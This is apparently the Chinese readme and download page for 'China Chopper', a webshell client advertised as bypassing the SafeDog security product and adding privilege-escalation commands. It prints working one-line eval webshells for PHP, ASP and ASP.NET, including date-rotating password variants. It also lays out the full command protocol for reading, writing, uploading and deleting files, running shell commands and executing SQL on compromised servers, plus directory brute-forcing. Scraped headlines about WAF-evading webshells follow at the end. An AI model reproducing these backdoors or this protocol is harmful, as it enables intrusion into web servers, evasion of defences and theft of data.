过狗菜刀?过安全狗中国菜刀。

最新专版过狗菜刀,过目前最新版V4.2安全狗!

1.支持过服务器安全狗V4.1.08893

2.支持过网站安全狗V3.3.09060

3.增加提权特殊命令功能

百度网盘:http://pan.baidu.com/s/1gdtiTTh

51CTO下载:http://down.51cto.com/data/2037909

(如有失效请上官网:www.cncaidao.net提交建议)

----------------------------------------------------------------------------------------------------------
免责申明:
    请使用者注意使用环境并遵守国家相关法律法规!
    由于使用不当造成的后果本厂家不承担任何责任!
----------------------------------------------------------------------------------------------------------
程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
----------------------------------------------------------------------------------------------------------

UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。

一、脚本客户端(包括但不限于EVAL)部分
  1)基本信息
      Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
      目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。
      在服务端运行的代码如下:
      PHP:    <?php @eval($_POST[‘chopper‘]);?>
      ASP:    <%eval request("chopper")%>
      ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
        (注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)
      Customize:    自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
        此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。

随日期变化的连接密码, 服务端写法:
    Asp.NET:
    <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
    PHP:
    @eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);
    例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper

  2)几大功能
      在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,
      保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。
      1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
      2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
      3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。
        如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。
        (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
       4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
        如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
        可以在官网下载别人的CCC脚本,或分享你的得意之作。
      注意:由于服务器的安全设置,某些功能可能不能正常使用。

  3)  配置信息填写说明
    ---------------------------------------------------------------------------------------
    A)  数据库方面:
    -----------------------------------------------------------------------------
    PHP脚本:
    <T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
    <H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
    <U>数据库用户</U> 连接数据库的用户名,如root
    <P>数据库密码</P> 连接数据库的密码,如123455

<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1

ASP和ASP.NET脚本:
    <T>类型</T> 类型只能填ADO
    <C>ADO配置信息</C>
    ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
    Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
    同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件

Customize 脚本:
    <T>类型</T> 类型只能填XDB
    <X>与Customize 脚本约定的配置信息</X>
    菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
    MSSQL:
    <X>
    com.microsoft.sqlserver.jdbc.SQLServerDriver
    jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
    </X>
    MYSQL:
    <X>
    com.mysql.jdbc.Driver
    jdbc:mysql://localhost/test?user=root&password=123456
    </X>
    ORACLE:
    <X>
    oracle.jdbc.driver.OracleDriver
    jdbc:oracle:thin:user/[email protected]:1521/test
    </X>

B) 其它方面:
    -----------------------------------------------------------------------------
    添加额外附加提交的数据,如ASP的新服务端是这样的:
    <%
    Set o = Server.CreateObject("ScriptControl")
    o.language = "vbscript"
    o.addcode(Request("SC"))
    o.run "ff",Server,Response,Request,Application,Session,Error
    %>
    那么,菜刀在配置处填入:
    <O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
    然后以密码pass来连接即可。

提交功能前先POST额外的数据包:会话期间只提交一次。
    <POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
    <DATA>uid=user1&pwd=123456</DATA>

默认终端程序路径设置示例:
    <SHELL>/bin/sh</SHELL>

虚拟终端默认命令设置示例:
    <CMD>whoami</CMD>

文件管理默认打开的目录设置示例:
    <CD>c:\windows\temp\</CD>

  3)  HTTP登录验证
    SHELL地址这样填 http://user:[email protected]/server.asp
    用户名密码中的特殊字符可用URL编码转换。

4)  数据导入:在SHELL列表界面,右键有一项菜单,可以把其它的菜刀库导入到当前分类中。

二、安全扫描
  蜘蛛爬行,绑定域名查询,目录爆破。
  命令解释:
    A) 查单一IP的绑定域名
    {reverse_ip} {url:http://www.maicaidao.com/}
    B) 扫描本C段开放的WEB服务器,并查询绑定域名
    {reverse_ip_c} {url:http://www.maicaidao.com/}
    C) 只扫描本C段开放的WEB服务器
    {reverse_ip_c} {url:http://www.maicaidao.com/} {port}
    D) 蜘蛛爬行
    {spider} {url:http://www.maicaidao.com/}
    E) 蜘蛛爬行,并设定爬行范围
    {spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
    F) 蜘蛛爬行,过滤重复URL加快速度
    加上 {filter}
    G) 爆破功能,%s为dict中的一行
        flag:后面为返回的数据(含HTTP头部)中的特定关键字
        加!!为不包含关键字为TRUE,否则包含关键字为TRUE
        list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
        注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件
    {crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
    {crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
    {crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}

三、定时提醒
    当闹钟来用吧, 周期:每月/每周/每日/只一次。

四、快速启动
    一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是加密存储的。

五、浏览器
    就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
    如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。

六、其它部分
    等待加入。

--------------------------------------------
20110628版更新注意事项
缓存库最好重建一下。
--------------------------------------------

文件说明:
------------------------------------------------------------------
chopper.exe    菜刀程序
db.mdb        菜刀的主数据库
------------------------------------------------------------------
cache.tmp    菜刀的缓存数据库(可删除)
readme.txt    你现在正在看的(可删除)
<CCC>        菜刀的自写脚本(可删除)
<Customize>    Customize模式的服务端(可删除)
    Customize.aspx    这是一个C#的示例服务端(全功能)
    Customize.jsp    这是一个jsp的示例服务端(全功能)
    Customize.cfm    这是一个cfm的示例服务端(文件管理,虚拟终端)

----附---------------------------Customize模式菜刀和服务端通信接口-----------------------------------------------------------------
----------------------------------其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm)---------------------
例:菜刀客户端填写的密码为pass,网页编码选的是GB2312(Jsp服务端会用到此参数)
注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记
注:返回的错误信息开头包含ERROR://
注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车
注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
-----------------------------------------------------------------------------------------------------------------------------------

[得到当前目录的绝对路径]
提交:pass=A&z0=GB2312
返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表
示例:c:\inetpub\wwwroot\    C:D:E:K:
示例:/var/www/html/

[目录浏览]
提交:pass=B&z0=GB2312&z1=目录绝对路径
返回:先目录后文件,目录名后要加/,文件名后不要加/
示例:
    目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n
    文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n

[读取文本文件]
提交:pass=C&z0=GB2312&z1=文件绝对路径
返回:文本文件的内容

[写入文本文件]
提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容
返回:成功返回1,不成功返回错误信息

[删除文件或目录]
提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径
返回:成功返回1,不成功返回错误信息

[下载文件]
提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径
返回:要下载文件的内容

[上传文件]
提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)
返回:要下载文件的内容

[复制文件或目录后粘贴]
提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径
返回:成功返回1,不成功返回错误信息

[文件或目录重命名]
提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)
返回:成功返回1,不成功返回错误信息

[新建目录]
提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)
返回:成功返回1,不成功返回错误信息

[修改文件或目录时间]
提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-dd HH:mm:ss)
返回:成功返回1,不成功返回错误信息

[下载文件到服务器]
提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径
返回:成功返回1,不成功返回错误信息

[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]
提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令
返回:命令执行结果

[得到数据库基本信息]
提交:pass=N&z0=GB2312&z1=数据库配置信息
返回:成功返回数据库(以制表符\t分隔), 不成功返回错误信息

[获取数据库表名]
提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名
返回:成功返回数据表(以\t分隔), 不成功返回错误信息

[获取数据表列名]
提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名
返回:成功返回数据列(以制表符\t分隔), 不成功返回错误信息

[执行数据库命令]
提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令
返回:成功返回数据表内容, 不成功返回错误信息
注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。行中的每列后加上\t|\t标记,每行以标记\r\n为结束

时间: 2024-08-05 13:10:45

过狗菜刀?过安全狗中国菜刀。的相关文章

整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 https://pan.baidu.com/s/1jHoJxHW China chopper https://pan.baidu.com/s/1eRxEYjC 特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行. 代码如下: <

红色版中国菜刀(20141213)正式发布 过狗红色菜刀

下载请认准官方网站:http://www.maicaidao.com/ 不过现在官方已经打不开了,很多朋友找不到下载地址,所以现在放出来,有需要的朋友可以自行下载! 下载地址:https://www.lanzous.com/i1xg3ib 软件简介: 软件名称:中国菜刀(China chopper)官方网站:http://www.maicaidao.com/------------------------------------免责申明:请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造

网络小黑揭秘系列之黑产江湖黑吃黑—中国菜刀的隐形把手

人在做,天在看. 黑产乃法外之地,被丛林法则所支配.没有了第三方强制力量的保障和监督,在那个圈子里我们可以看到两个极端:想做大生意的往往极重信誉,而那些只想捞一票就走的则会肆无忌惮地黑吃黑. 2015年12月中,360天眼实验室发布了“网络小黑揭秘系列之黑色SEO初探”,简单揭露了下网络上的黑色SEO活动,同时也提到了很多黑客工具中带有后门,其中就包括了某些使用面非常广的工具.没错,这回我们的主角是小黑们最喜闻乐见的中国菜刀. 0x01 中国菜刀 菜刀,厨房切菜之利器,亦可用于砍人.中国菜刀(C

新版中国菜刀20160620初体验

6月17号,某牛在朋友圈发了消息: 史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的境界. 当时有消息称 6 月底将会发布新版菜刀. 果不其然,在 6 月 20 日,原本已经关闭的 maicaidao.com 又开放了,而且下载量瞬间就到了 660 +. 话不多说,赶紧去下载一个体验一波到底有多牛逼. 文章发布时站点又关闭了,具体原因不得而知.(脉搏SP小编注:应该是被DDoS了) 脉搏小编看了一下whois变更,认为应该还是老兵作品.相关阅读<

小白日记51:kali渗透测试之Web渗透-WebShell(中国菜刀、WeBaCoo、Weevely)

webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一

最新中国菜刀caidao-20160620下载和说明

0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了. 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ 1 菜刀,他是一款专业的网站管理工具 一.网站管理模块 (1)放在网站上的脚本程序分两种 1.1)“一句话(Eval)”: PHP, ASP, AS

(转载)中国菜刀的使用

想学学怎么用菜刀,刚在网上搜到了菜刀的使用方法.怕有和我一样的新手不会用,所以发过来,算是给大家分享吧.首先说一下菜刀的功能,菜刀是用来连一句话的,asp.aspx.php的一句话菜刀都可以连,只是这几种一句话语句不一样.  asp的一句话是:<%eval request("pass")%>  aspx的一句话是:<%@ Page Language="Jscript"%><%eval(Request.Item["pass&qu

&nbsp; 中国菜刀使用方法以及小技巧

相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库. 服务端: 在服务端运行的代码如下: PHP: ASP: <%eval request("pass")%&g

夜猫中国菜刀1.0版

夜猫中国菜刀 要就下载哦!!! 无后门,强大菜刀工具 下载地址:http://pan.baidu.com/s/1gfwi8vT

中国菜刀原理

用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验了,Asp和jsp的原理应该都差不多. 服务端的.php是这样: <?php eval($_POST['op']); ?> 客户端连接设置好URL,密码,连接好之后.我们开始实